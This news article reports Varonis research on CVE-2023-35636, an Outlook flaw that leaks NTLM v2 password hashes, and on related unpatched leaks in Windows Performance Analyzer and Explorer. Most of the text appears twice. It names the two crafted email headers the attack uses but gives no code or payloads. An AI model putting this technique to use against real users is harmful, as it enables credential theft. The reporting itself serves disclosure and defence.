Varonis explained how hackers can steal your Outlook password with a single file.
A fixed security vulnerability in Microsoft Outlook can be exploited by attackers to access hashed NT LAN Manager (NTLM) v2 passwords when opening a specially created file.
NTLM v2 is a protocol used to authenticate users on remote servers. A hash of an NTLM v2 user's password can be valuable to attackers, since they can either run a brute-force attack and get the password in plaintext, or use the hash to authenticate directly.
The issue, tracked as CVE-2023-35636 (CVSS score: 6.5), was fixed by Microsoft as part of an unscheduled security update in December 2023. According to a statement from Microsoft, the flaw works as follows:
In other words, the attacker needs to convince the victim to click on a link embedded in a phishing email or sent via a message, and then trick them into opening the corresponding file.
CVE-2023-35636 affects the calendar sharing feature in Outlook, in which a malicious email is created by inserting two headers "Content-Class" and "x-sharing-config-url" with specially created values in order to reveal the victim's NTLM hash during authentication. The email forces Outlook to connect to the hacker's server and pass it the NTLM v2 hash for authentication.
Varonis security researcher Dolev Thaler, who is credited with detecting and reporting the bug, said that NTLM hashes can leak when using the Windows Performance Analyzer (WPA) and Windows Explorer. However, these two methods of attack remained without corrections.
Thaler noted that WPA attempts to authenticate using NTLM v2 over an open network. Normally, you should use NTLM v2 when trying to authenticate to internal services based on an IP address. However, when the NTLM v2 hash passes through the open Internet, it is vulnerable to relay attacks and brute-force offline attacks.
This incident serves as a reminder for both individuals and organizations to remain vigilant, regularly update the software, and be careful with suspicious emails and files. The situation also highlights the need for reliable security protocols and continuous monitoring of systems to detect and eliminate such vulnerabilities in a timely manner.
A fixed security vulnerability in Microsoft Outlook can be exploited by attackers to access hashed NT LAN Manager (NTLM) v2 passwords when opening a specially created file.
NTLM v2 is a protocol used to authenticate users on remote servers. A hash of an NTLM v2 user's password can be valuable to attackers, since they can either run a brute-force attack and get the password in plaintext, or use the hash to authenticate directly.
The issue, tracked as CVE-2023-35636 (CVSS score: 6.5), was fixed by Microsoft as part of an unscheduled security update in December 2023. According to a statement from Microsoft, the flaw works as follows:
- in an email attack scenario, a cybercriminal can take advantage of the vulnerability by sending a specially crafted file to the user and convincing them to open the file;
- in a web attack scenario, an attacker can host a website (or use a compromised website that accepts or hosts user-provided content) containing a specially crafted file designed to exploit the vulnerability.
In other words, the attacker needs to convince the victim to click on a link embedded in a phishing email or sent via a message, and then trick them into opening the corresponding file.
CVE-2023-35636 affects the calendar sharing feature in Outlook, in which a malicious email is created by inserting two headers "Content-Class" and "x-sharing-config-url" with specially created values in order to reveal the victim's NTLM hash during authentication. The email forces Outlook to connect to the hacker's server and pass it the NTLM v2 hash for authentication.
Varonis security researcher Dolev Thaler, who is credited with detecting and reporting the bug, said that NTLM hashes can leak when using the Windows Performance Analyzer (WPA) and Windows Explorer. However, these two methods of attack remained without corrections.
Thaler noted that WPA attempts to authenticate using NTLM v2 over an open network. Normally, you should use NTLM v2 when trying to authenticate to internal services based on an IP address. However, when the NTLM v2 hash passes through the open Internet, it is vulnerable to relay attacks and brute-force offline attacks.
This incident serves as a reminder for both individuals and organizations to remain vigilant, regularly update the software, and be careful with suspicious emails and files. The situation also highlights the need for reliable security protocols and continuous monitoring of systems to detect and eliminate such vulnerabilities in a timely manner.
